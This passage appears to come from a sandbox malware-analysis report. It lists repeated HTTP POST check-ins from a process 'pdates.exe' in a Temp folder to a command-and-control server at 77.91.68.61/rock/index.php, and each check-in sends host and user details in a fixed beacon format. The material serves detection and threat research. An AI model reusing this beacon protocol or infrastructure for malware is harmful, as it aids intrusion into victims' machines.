Jul 27, 2023 01:33:11.048084021 CEST	2871	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:11.098570108 CEST	2871	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
370	192.168.2.5	50090	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:41.267807961 CEST	3983	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:41.315283060 CEST	3983	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
371	192.168.2.5	50091	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:41.474457026 CEST	3984	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:41.523792028 CEST	3984	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
372	192.168.2.5	50092	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:41.691284895 CEST	3985	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:41.739165068 CEST	3985	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
373	192.168.2.5	50093	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:41.892855883 CEST	3986	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:41.941468000 CEST	3986	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
374	192.168.2.5	50094	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:42.097816944 CEST	3987	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:42.146707058 CEST	3987	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
375	192.168.2.5	50095	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:42.322523117 CEST	3988	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:42.371165037 CEST	3988	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
376	192.168.2.5	50096	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:42.552546024 CEST	3989	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:42.600610018 CEST	3989	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
377	192.168.2.5	50097	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:42.771971941 CEST	3990	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:42.821285009 CEST	3990	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
378	192.168.2.5	50098	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:42.999835968 CEST	3990	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:43.048254013 CEST	3991	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
379	192.168.2.5	50099	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:43.202574968 CEST	3991	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:43.251418114 CEST	3992	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49754	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:11.255734921 CEST	2872	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:11.303713083 CEST	2872	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
380	192.168.2.5	50100	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:43.418942928 CEST	3992	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:43.467307091 CEST	3993	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
381	192.168.2.5	50101	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:43.657293081 CEST	3993	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:43.705420971 CEST	3994	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
382	192.168.2.5	50102	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:43.858784914 CEST	3994	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:43.907200098 CEST	3995	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
383	192.168.2.5	50103	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:44.063651085 CEST	3995	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:44.113854885 CEST	3996	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
384	192.168.2.5	50104	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:44.296425104 CEST	3996	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:44.345272064 CEST	3996	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
385	192.168.2.5	50105	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:44.500380039 CEST	3997	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:44.549408913 CEST	3997	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
386	192.168.2.5	50106	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:44.704464912 CEST	3998	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:44.753607035 CEST	3998	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
387	192.168.2.5	50107	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:44.919317961 CEST	3999	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:44.968126059 CEST	3999	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
388	192.168.2.5	50108	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:45.130831003 CEST	4000	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:45.178554058 CEST	4000	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
389	192.168.2.5	50109	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:45.331247091 CEST	4001	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:45.380186081 CEST	4001	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49755	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:11.536714077 CEST	2874	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:11.586210012 CEST	2883	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
390	192.168.2.5	50110	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
